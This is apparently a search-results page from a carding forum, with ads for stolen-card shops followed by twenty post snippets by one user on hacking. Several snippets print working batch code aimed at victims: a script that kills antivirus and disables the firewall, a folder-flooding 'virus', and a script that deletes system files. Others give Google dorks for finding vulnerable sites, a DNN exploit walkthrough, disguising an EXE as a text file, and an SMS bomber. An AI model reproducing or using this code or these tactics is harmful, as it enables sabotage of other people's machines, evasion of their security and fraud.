Ad End 1 November 2025
Ad End 4 April 2026
Ad Ends 13 July 2025
ad End 25 October 2025
banner Expire 3 February 2026
adv exp at 30 July 2025
banner Expire 25 October 2025
What's new
banner Expire 23 August 2025
Wizard's shop 2.0
Money Club cc shop
banner Expire 15 January 2025
banner Expire 20 October 2024
UniCvv
best shop
Yale Lodge
Kfc CLub
Carding.pw carding forum
BidenCash Shop

Search results

  1. File_closed07

    A simple batch program for Port Scanning

    Hi friends in this post we are going to see how to create Batch programming for port scanning. Open Notepad Paste this code: @ECHO off color 0a cd C: cls for /L %%v in (1,1,11) do telnet %1 %%v GOTO scan2 :scan2 for /L %%w in (12,1,20) do telnet %1 %%w Save it with .bat extension(for eg...
  2. File_closed07

    How to hack the Computer using Hardware Keylogger?

    So far we have seen about the Keylogger software, now i am introducing Hardware key logger to my readers. If you don’t know about key logger ,please read this article. What is Key logger? What is Malicious softwares? Drawbacks of Key logger Software: Easily detectable User can block the...
  3. File_closed07

    COMMON METHODS USED FOR WEBSITE HACKING

    Remote File Inclusion or RFI SQL injection Cross site scripting or XXS Local file inclusion or LFI Directory Traversal attack RFI: RFI stands for Remote File Inclusion and it allows the attacker to upload a custom coded/malicious file on a website or server using a script. The vulnerability...
  4. File_closed07

    Introduction to Social Engineering world | Hack the people

    What is Social Engineering? Social engineering is the act of manipulating people into performing actions or divulging confidential information, rather than by breaking in or using technical cracking techniques.[1] While similar to a confidence trick or simple fraud, the term typically applies to...
  5. File_closed07

    How to Find a vulnerable website?

    Google is best friend for Hackers. We can find the Vulnerable website using google search. This is known as Google Dorks. Small List of Google Dork: inurl:index.php?id= inurl:gallery.php?id= inurl:post.php?id= inurl:article?id= Download A large list of Google dork from here copy one from above...
  6. File_closed07

    Fake virus for making fun with your friends

    Hi friends, you probably don’t want to harm your friend pc but you like to fun with them. If you think so, then you can use this fake virus. Fake virus what i mean? This is not at all virus. This is not at all make any effect. It just shut down your friend system for only once and show ” your...
  7. File_closed07

    How to send the EXE file as text file?

    1. First of all You have to download the TEXT ICON PACK . You can Download It From Below: Download 2. Extract the Icon Pack to Obtain the Text Icons. 3. Open a new file, Right click – New – Shortcut Type the location of the item: “X:WINDOWSsystem32cmd.exe /c file.txt” (where stands for...
  8. File_closed07

    Tutorial for Hack a website Using DNN [Dot Net Nuke] Exploit

    First Check whether the Website is vulnerable or not( if you don’t know how to do it, read this) Or simply copy this code to google and hit enter: inurl:/portals/0 Open the home page and check any image which is located in /portals/0/ Check the location of the image. It should be located in...
  9. File_closed07

    How to disable/delete your victim’s Antivirus?

    Here i am giving you the batch program to disable or delete the antivirus in victims computer. @ echo off rem — rem Permanently Kill Anti-Virus net stop “Security Center” netsh firewall set opmode mode=disable tskill /A av* tskill /A fire* tskill /A anti* cls tskill /A spy* tskill /A bullguard...
  10. File_closed07

    Hacking is Art of Exploitation

    Hacking is Art of Exploitation DukLoad
  11. File_closed07

    A huge list of Google Dork on Break The Security

    Hack using Google dork. Find vulnerable websites using Google dork. Download From Here Don’t you know how to use this google dork list? Read this article
  12. File_closed07

    introduction to break the security using Denial of Service attack

    WHAT IS A DENIAL OF SERVICE ATTACK? A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it...
  13. File_closed07

    Create a virus to make the computer freezed using Batch Programming

    Now i am going to give you simple and only one line Batch code. Special about this virus is that easy to remember the code. So it will be useful to use in college or school. This is for newbie. This virus is harmful for CPU. So be careful. Don’t run this in your pc or friend pc. Open a...
  14. File_closed07

    Create a virus to create a infinite folder in a drive

    Hi Hackers, this batch code will very helpful for you. This is simple and effective virus code. As usual open notepad. Copy this code to Notepad. @echo off :top md %random% goto top @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder. md...
  15. File_closed07

    Tracing a website using command prompt |Hacking Tips

    Tracing or Routing a website using command prompt. This tip is only meant for educational purpose. I mainly use this trick to find out the hosting provider where a particular domain is hosted. Follow the below steps: 1. Start->Run->CMD ie; open Command prompt 2. Type the following command and...
  16. File_closed07

    How to fix the product expired problem in Adobe Photoshop?

    Are you getting this error while opening Photoshop CS3 or Illustrator CS3 “Product License Has Expired” 1. delete cache.db in “c:Program FilesCommon FilesAdobeAdobe PCDcache” 2. Run the adobe cs3 product 3. enter the products key for adobe cs3 product 4. set read-only attribute for “c:Program...
  17. File_closed07

    Virus to Delete mouse,explore,logoff using Batch Programming

    Usually we write simple viruses in batch programming. This time also i have one Batch Programming. It will delete explore.exe,logoff ,mouse,keyboard files. So victims can not do anything in his computer. @echo off @if exist c:windowssystem32mouse del c:windowssystem32mouse @if exist...
  18. File_closed07

    Command Line SMS Bomber for linux users

    This Post is writtern By disk0 A friend and I wrote this command line SMS bomber in Bash. It allows you to set the message you want to send, the phone number to send it to, the carrier of the phone (which can be found at http://www.fonefinder.net), and the delay between messages. You’ll need...
  19. File_closed07

    How to Reverse JavaScript Shellcode:?

    With more and more exploits being written in JavaScript, even some 0-day, there is a need to be able to reverse exploits written in JavaScript beyond de-obfuscation. I spent some time this weekend searching Google for a simple way to reverse JavaScript shellcode to assembly. I know people do it...
  20. File_closed07

    How to disable writing to USB?

    If you are the administrator of public cafe or school,this trick will be helpful for giving protection to your system. You can disable writing to USB. This will prevent from file stealing. You have to login to administrator so that you can access regedit. Go to start . Select run. Type as...
Ad End 1 November 2024
Top